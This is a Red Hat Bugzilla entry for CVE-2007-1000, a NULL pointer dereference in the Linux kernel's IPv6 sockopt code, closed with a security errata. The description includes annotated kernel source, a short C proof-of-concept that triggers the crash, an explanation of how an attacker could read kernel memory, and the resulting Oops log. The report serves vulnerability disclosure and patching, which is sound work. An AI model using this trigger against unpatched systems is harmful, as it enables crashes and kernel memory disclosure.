Note: This is a beta release of Red Hat Bugzilla 5.0. The data contained within is a snapshot of the live data so any changes you make will not be reflected in the production Bugzilla. Also email is disabled so feel free to test any aspect of the site that you want. File any problems you find or give feedback here.
Bug 232257 - CVE-2007-1000 NULL pointer hole in ipv6
Summary: CVE-2007-1000 NULL pointer hole in ipv6
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Enterprise Linux 5
Classification: Red Hat
Component: kernel
Version: 5.0
Hardware: All
OS: Linux
medium
high
Target Milestone: ---
: ---
Assignee: Don Howard
QA Contact: Martin Jenner
URL:
Whiteboard: impact=important,source=vendorsec,rep...
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2007-03-14 16:04 UTC by Marcel Holtmann
Modified: 2007-11-30 22:07 UTC (History)
2 users (show)

Fixed In Version: RHSA-2007-0169
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2007-04-30 16:38:01 UTC


Attachments (Terms of Use)


Links
System ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2007:0169 normal SHIPPED_LIVE Important: kernel security and bug fix update 2007-04-30 16:36:50 UTC

Description Marcel Holtmann 2007-03-14 16:04:06 UTC
There is a NULL pointer dereference which can lead to an arbitray kernel memory
leak, in the file net/ipv6/ipv6_sockglue.c :

340 	case IPV6_2292PKTOPTIONS:
341 	{
342 		struct ipv6_txoptions *opt = NULL;                        [1]
343 		struct msghdr msg;
344 		struct flowi fl;
345 		int junk;
346 
347 		fl.fl6_flowlabel = 0;
348 		fl.oif = sk->sk_bound_dev_if;
349 
340		if (optlen == 0)
341 			goto update;                                            [2]

377 update:
378 		retv = 0;
379 		if (inet_sk(sk)->is_icsk) {
380 			if (opt) {
...
389 			}
390 			opt = xchg(&np->opt, opt);                              [3]
391			sk_dst_reset(sk);
392		} else {
393			write_lock(&sk->sk_dst_lock);
394			opt = xchg(&np->opt, opt);                                [4]
395			write_unlock(&sk->sk_dst_lock);
396			sk_dst_reset(sk);
397		}

819	case IPV6_DSTOPTS:
820		{
821	
822			lock_sock(sk);
823			len = ipv6_getsockopt_sticky(sk, np->opt->hopopt,         [5]
824						     optval, len);
825			release_sock(sk);
826			return put_user(len, optlen);
827		}

In the function do_ipv6_setsockopt(), if optname = IPV6_2292PKTOPTIONS and
optlen = 0 [2], np->opt is set to NULL [3][4].
In the function do_ipv6_getsockopt(), if optname = IPV6_DSTOPTS, np->opt is
dereferenced [5].

An attacker can read any portion of the kernel memory : ipv6_getsockopt_sticky()
copies np->opt->hopopt to optavl which is an user buffer, and np->opt can be
mmaped to NULL.

Here is a program that reproduces the bug :
#include <netinet/in.h>
int main(int argc, char *argv[]) {
  int s;
  unsigned int optlen = 4;
  s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
  setsockopt(s, IPPROTO_IPV6, 6, (void *)NULL, 0);
  getsockopt(s, IPPROTO_IPV6, 59, (void *)NULL, &optlen);
  return 0;
}

And the Oops output :
[17183522.904000] BUG: unable to handle kernel NULL pointer dereference at
virtual address 00000008
[17183522.904000]  printing eip:
[17183522.904000] f8eba4d4
[17183522.904000] *pde = 00000000
[17183522.904000] Oops: 0000 [#1]
[17183522.904000] Modules linked in: nls_utf8 nls_cp437 vfat fat sg sd_mod
usb_storage libusual binfmt_misc rfcomm hidp l2cap bluetooth fglrx speedstep_centr
ino cpufreq_userspace cpufreq_stats freq_table cpufreq_powersave
cpufreq_ondemand cpufreq_conservative video tc1100_wmi sbs sony_acpi pcc_acpi
i2c_ec i2c_cor
e hotkey dev_acpi button battery container ac asus_acpi dm_mod md_mod sr_mod
sbp2 scsi_mod parport_pc lp parport ipv6 8139cp pcmcia 8139too joydev ipw2200 mi
i ieee80211 ieee80211_crypt yenta_socket rsrc_nonstatic sdhci mmc_core tifm_7xx1
tifm_core tsdev pcmcia_core snd_intel8x0 snd_ac97_codec snd_ac97_bus snd_pcm
_oss snd_mixer_oss snd_pcm snd_timer snd evdev intel_agp agpgart usbhid rtc
soundcore snd_page_alloc shpchp pci_hotplug psmouse serio_raw ext3 jbd ohci1394 i
eee1394 ehci_hcd uhci_hcd usbcore ide_generic ide_cd cdrom ide_disk piix generic
thermal processor fan capability commoncap vesafb fbcon tileblit font bitbli
t softcursor
[17183522.904000] CPU:    0
[17183522.904000] EIP:    0060:[<f8eba4d4>]    Tainted: P      VLI
[17183522.904000] EFLAGS: 00210286   (2.6.17-11-386 #2) 
[17183522.904000] EIP is at ipv6_getsockopt+0x4e4/0x6d0 [ipv6]
[17183522.904000] eax: 00000000   ebx: d33d1b00   ecx: d33d1f18   edx: d33d1f18
[17183522.904000] esi: 00000000   edi: 00000029   ebp: 0000003b   esp: dcd07d5c
[17183522.904000] ds: 007b   es: 007b   ss: 0068
[17183522.904000] Process poc (pid: 5968, threadinfo=dcd06000 task=dbbb5540)
[17183522.904000] Stack: 00000001 00000003 dfa794d8 00200286 d33d1f18 d2b8b3ec
00000004 00000006 
[17183522.904000]        c025a68b 00200296 00000000 e15f2440 d2b8b3ec 00200282
d33d1b00 00000000 
[17183522.904000]        d33d1b00 00000000 f8eba94b 00000000 00000000 dfed6000
f8c9a4ff 00000000 
[17183522.904000] Call Trace:
[17183522.904000]  <c025a68b> lock_sock+0xab/0xc0  <f8eba94b>
ipv6_setsockopt+0x16b/0xc40 [ipv6]
[17183522.904000]  <f8c92614> __ext3_journal_stop+0x24/0x50 [ext3]  <c0179c74>
__mark_inode_dirty+0x34/0x170
[17183522.904000]  <c013c78b> do_generic_mapping_read+0x42b/0x540  <c0154f74>
cache_alloc_refill+0x314/0x4d0
[17183522.904000]  <c0288da6> tcp_getsockopt+0x36/0x2b0  <c016f0b7>
d_alloc+0x27/0x190
[17183522.904000]  <c016f059> d_instantiate+0x49/0x80  <f8eba7e0>
ipv6_setsockopt+0x0/0xc40 [ipv6]
[17183522.904000]  <c0289966> tcp_setsockopt+0x36/0x370  <c0259de3>
sock_common_getsockopt+0x23/0x30
[17183522.904000]  <c025872e> sys_getsockopt+0x8e/0xc0  <c0259a44>
sys_socketcall+0x234/0x280
[17183522.904000]  <c02c7a00> do_page_fault+0x0/0x6e0  <c0102dbb>
sysenter_past_esp+0x54/0x79
[17183522.904000] Code: ff 8b 4c 24 10 0f b6 41 45 c0 e8 02 83 e0 01 89 84 24 54
01 00 00 e9 ee fb ff ff 89 d8 31 f6 e8 13 01 3a c7 8b 54 24 10 8b 42 58 <8b>
 50 08 85 d2 74 2c 0f b6 42 01 be f2 ff ff ff 8d 3c c5 08 00 
[17183522.904000] EIP: [<f8eba4d4>] ipv6_getsockopt+0x4e4/0x6d0 [ipv6] SS:ESP
0068:dcd07d5c

Comment 3 Don Howard 2007-03-29 21:42:07 UTC
A patch for this issue has been included in zstream build 2.6.18-8.1.2.el5.

Comment 5 Mike Gahagan 2007-04-27 14:38:41 UTC
verified with 2.6.18-8.1.3.el5.

Comment 7 Red Hat Bugzilla 2007-04-30 16:38:01 UTC
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2007-0169.html



Note You need to log in before you can comment on or make changes to this bug.